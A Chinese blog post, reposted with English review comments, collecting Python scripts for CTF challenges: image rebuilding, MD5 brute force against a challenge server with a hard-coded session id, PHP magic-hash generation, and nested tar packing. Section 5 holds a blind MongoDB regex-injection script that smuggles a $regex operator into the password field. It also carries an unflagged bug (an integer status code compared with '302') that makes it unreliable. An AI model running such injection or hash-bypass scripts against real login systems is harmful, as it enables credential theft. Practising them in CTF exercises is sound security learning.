• 积累一点 CTF 需要掌握的常见脚本知识


    1.利用像素点还原图片。

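     from PIL import Image
     import re

     # Rebuild an image from a text dump of pixel colours.
     # Each line of ce.txt is read as one pixel in the form "R,G,B"; lines are
     # consumed column by column (x is the outer loop, y the inner loop).
     if __name__ == '__main__':
         # The dimensions come from factoring the total number of pixel lines
         # into width * height (here 887 * 111).
         x = 887
         y = 111

         c = Image.new("RGB", (x, y))
         # The context manager closes the file even if a line fails to parse.
         with open('ce.txt') as file_object:
             for i in range(0, x):
                 for j in range(0, y):
                     # next() works on Python 2 and 3; the published
                     # file_object.next() exists only on Python 2.
                     line = next(file_object)
                     lst = line.split(",")  # list of the three channel strings
                     c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

         c.show()
         c.save("c.png")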

    2.利用 Python requests 库获取页面,用正则匹配提取文本,并暴力破解 MD5 值。

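     # coding: utf-8
     import requests
     import re
     import hashlib
     import itertools

     # CTF "compute and answer" helper: fetch the challenge page, read the target
     # MD5 digest and the character set from it, find the 9-character permutation
     # whose MD5 equals the target, and submit it within the same session.
     #
     # Why this is feasible: when str1 has 9 characters there are only
     # 9! = 362880 candidates, and MD5 is a fast hash, so the whole space is
     # searched almost instantly. A fast unsalted hash over a small input space
     # does not protect a secret.
     s = requests.session()  # one session so cookies persist between requests
     url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"
     # NOTE(review): a session identifier is hard-coded here as published and is
     # passed through data= (request body), not as a cookie. Session ids are
     # credentials and should not be kept in shared scripts.
     data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}
     # timeout keeps a stalled connection from hanging the script
     content = s.get(url=url, data=data, timeout=10)
     # Single-quoted patterns: the published listing lost the quoting around the
     # embedded double quote, which made these two lines a syntax error.
     target = re.findall('sh">(.*)<', content.text)
     target = target[0]
     poc = re.findall('code">(.*)<', content.text)
     str1 = poc[0]

     # permutations() yields tuples of characters taken from distinct positions
     # of str1; join() turns each tuple back into a string. Iterating lazily
     # avoids building the full candidate list in memory first.
     for candidate in itertools.permutations(str1, 9):
         guess = ''.join(candidate)
         # hashlib requires bytes on Python 3
         final = hashlib.md5(guess.encode("utf-8"))
         if final.hexdigest() == target:
             flag = s.get(url="http://106.75.67.214:2050/?code=" + guess, timeout=10)
             print(flag.content)
             print(flag.headers)
             break  # one correct answer is enough; do not resubmit duplicates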

     3.利用py将base64编码的字符串还原成图片

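    import base64
    import os

    # Decode a base64 string and write the raw bytes to an image file.
    # "sdasdas==" is only a placeholder (it is not valid base64 as written);
    # replace it with the real encoded text. The published listing also had two
    # stray quote characters at the start of the literal.
    strs = '''sdasdas=='''

    imgdata = base64.b64decode(strs)
    # The output name is fixed to .jpg; the decoded bytes are not checked to be
    # an image, so treat the file as untrusted data until it has been inspected.
    # "wb" because the payload is binary; the context manager closes the file
    # even if the write fails.
    with open('1.jpg', 'wb') as out:
        out.write(imgdata)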

     4.生成0e哈希值:

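     #coding:utf-8
     import hashlib
     import itertools

     def go():
         """Print strings whose salted double MD5 has the form "0e<digits>".

         For each candidate p the value md5(md5(p).hexdigest() + "SALT") is
         computed, and p is printed when that hex digest starts with "0e" and
         every remaining character is a decimal digit.

         Digests of this shape are the "magic hash" case: PHP's loose "=="
         comparison reads two "0e<digits>" strings as numbers in scientific
         notation (both zero), so they compare equal. Comparing digests with
         "===" or hash_equals() on the server side removes the problem.

         The function does not stop at the first match; it keeps walking the
         35**30 candidate strings and only prints hits.
         """
         payload = list("qwertyuioplkjhgfdsazxcvbnm123654789")
         print(payload)
         for j in itertools.product(payload, repeat=30):  # repeat = candidate length
             payloads = "".join(j)
             # hexdigest must be called: the published listing concatenated the
             # bound method itself with "SALT", which raises TypeError.
             str1 = hashlib.md5(payloads.encode("utf-8")).hexdigest() + "SALT"
             # Work on the hex string; the published listing indexed the hash
             # object, which is not subscriptable.
             str2 = hashlib.md5(str1.encode("utf-8")).hexdigest()
             if str2.startswith("0e") and str2[2:].isdigit():
                 print(payloads)

     go()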

    5.mongodb基于正则注入:

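     #coding:utf-8
     import requests
     import string

     # CTF example of blind extraction through MongoDB operator injection.
     # The parameter name "passwd[$regex]" is meant to reach the database query
     # as a $regex operator instead of a plain string, and a 302 response is
     # used as the "pattern matched" signal while the known prefix grows one
     # character at a time.
     #
     # Defensive reading: the server should accept only string values for
     # credentials (reject arrays/objects, or cast to string before building
     # the query) so request parameters can never introduce query operators,
     # and should verify passwords against a stored hash rather than by a
     # database match. Parameter names containing "[$" in request logs are a
     # useful detection signal.
     #
     # NOTE(review): request construction and the status check are reproduced
     # as published; only the print calls (valid on Python 2 and 3) and the
     # request timeout were changed.
     flag = "c1ctf{"
     payload = string.ascii_letters + string.digits

     url = "http://xx.x.x.x/index.php?"
     restsrt = True
     while restsrt:
         restsrt = False
         for i in payload:
             payloads = flag + i
             post_data = {"username":"admin","passwd[$regex]":flag+".*"}
             #post_data = {"username":"admin","passwd[$regex]":"^"+flag}
             # timeout keeps a stalled connection from hanging the loop forever
             r = requests.get(url = url,data = post_data,allow_redirects = False,timeout = 10)
             if r.status_code == "302":
                 print(payloads)
                 flag = flag + i
                 restsrt =True
                 if i == "}":
                     exit(0)
                 break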

    6.多次压缩打包

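     #coding:utf-8
     import tarfile

     # Build a chain of nested gzip-compressed tar archives.
     # Anything that unpacks archives recursively should cap the nesting depth
     # and the total extracted size; a chain like this one is what such limits
     # exist for.

     # Innermost layer: shell0.tar.gz holds flag.py.
     # (The published "for i in range(1,2)" loop ran exactly once.)
     # The context manager closes the archive even if add() fails.
     with tarfile.open("shell0.tar.gz", "w:gz") as tfile:
         tfile.add("flag.py")

     # Layers 1..299: each archive holds 1.php plus the previous layer, so
     # shell299.tar.gz wraps the whole chain.
     for i in range(1, 300):
         with tarfile.open("shell" + str(i) + ".tar.gz", "w:gz") as tfile:
             tfile.add("1.php")
             tfile.add("shell" + str(i - 1) + ".tar.gz")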

    7.多次解压:

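    #coding:utf-8
    import tarfile

    # Unpack the nested archives from the outermost layer (shell299.tar.gz)
    # inwards; each layer extracts the next one into the current directory.
    # The loop stops at layer 1, so shell0.tar.gz is written out but is not
    # itself unpacked.
    for i in reversed(range(1, 300)):
        # The published listing built "shell<i>tar.gz" without the dot, which
        # does not match the "shell<i>.tar.gz" names produced when packing.
        with tarfile.open("shell" + str(i) + ".tar.gz") as archive:
            # extractall() trusts member paths: with an archive from an
            # untrusted source, entries using "../" or absolute paths can be
            # written outside the working directory. Use the "data" extraction
            # filter where this Python version provides it.
            if hasattr(tarfile, "data_filter"):
                archive.extractall(filter="data")
            else:
                archive.extractall()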
  • 原文地址:https://www.cnblogs.com/tr1ple/p/6067414.html